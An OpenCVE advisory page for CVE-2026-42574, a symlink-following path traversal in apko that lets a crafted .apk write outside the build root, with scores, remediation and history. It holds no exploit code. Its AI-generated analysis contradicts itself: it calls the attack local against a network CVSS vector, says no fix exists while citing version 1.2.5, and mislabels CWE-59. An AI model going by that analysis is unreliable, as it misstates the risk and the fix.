Description
apko allows users to build and publish OCI container images built from apk packages. From version 0.14.8 to before version 1.2.5, a crafted .apk could install a TypeSymlink tar entry whose target pointed outside the build root, and a subsequent directory-creation or file-write entry in the same or later archive could traverse that symlink to reach host paths the build user could write to. This issue has been patched in version 1.2.5.
Published: 2026-05-09
Score: 7.5 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A crafted .apk archive supplied to apko can contain a type‑symlink entry whose target points outside the image build root. A subsequent directory‑creation or file‑write entry in the same or a later archive can then resolve that symlink and write data to arbitrary paths on the host system that the build user can modify. The result is the ability to create or overwrite files outside the container image, allowing a local attacker to tamper with the build environment or, if the host is compromised, to place malicious artifacts on host file systems. This demonstrates a CWE‑22 path traversal combined with a CWE‑59 cross‑device traversal weakness.

Affected Systems

The vulnerability affects chainguard‑dev apko from version 0.14.8 up through, but not including, version 1.2.5. Earlier releases are impacted, and the patch was released in apko v1.2.5.

Risk and Exploitability

The CVSS score of 7.5 indicates a high‑severity local impact. The EPSS score is unavailable, and the vulnerability is not listed in CISA’s KEV catalog. The exploit requires an attacker to build a container with a specially crafted .apk file, so the attack vector is local to the build environment. An attacker with build privileges can write arbitrary files on the host, potentially compromising build integrity or enabling privilege escalation within that context.

Generated by OpenCVE AI on May 9, 2026 at 20:50 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade apko to version 1.2.5 or later to apply the vendor fix.
  • Disallow or monitor the use of untrusted .apk packages in the build pipeline.
  • Execute apko builds inside a read‑only or highly restricted sandbox to prevent the build root from modifying host file systems.
  • Restrict file system permissions for the user running apko so that accidental writes outside intended directories are prevented.

Generated by OpenCVE AI on May 9, 2026 at 20:50 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-qq3r-w4hj-gjp6 apko dirFS has a symlink-following path traversal that allows multiple entry points to escape the build root
History

Sat, 09 May 2026 20:45:00 +0000

Type Values Removed Values Added
First Time appeared Chainguard-dev
Chainguard-dev apko
Vendors & Products Chainguard-dev
Chainguard-dev apko

Sat, 09 May 2026 19:45:00 +0000

Type Values Removed Values Added
Description apko allows users to build and publish OCI container images built from apk packages. From version 0.14.8 to before version 1.2.5, a crafted .apk could install a TypeSymlink tar entry whose target pointed outside the build root, and a subsequent directory-creation or file-write entry in the same or later archive could traverse that symlink to reach host paths the build user could write to. This issue has been patched in version 1.2.5.
Title apko dirFS has a symlink-following path traversal that allows multiple entry points to escape the build root
Weaknesses CWE-22
CWE-59
References
Metrics cvssV3_1

{'score': 7.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}

Subscriptions

Chainguard-dev Apko
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-09T19:24:48.497Z

Reserved: 2026-04-28T17:26:12.085Z

Link: CVE-2026-42574

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Received

Published: 2026-05-09T20:16:29.420

Modified: 2026-05-09T20:16:29.420

Link: CVE-2026-42574

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-09T21:00:12Z

Weaknesses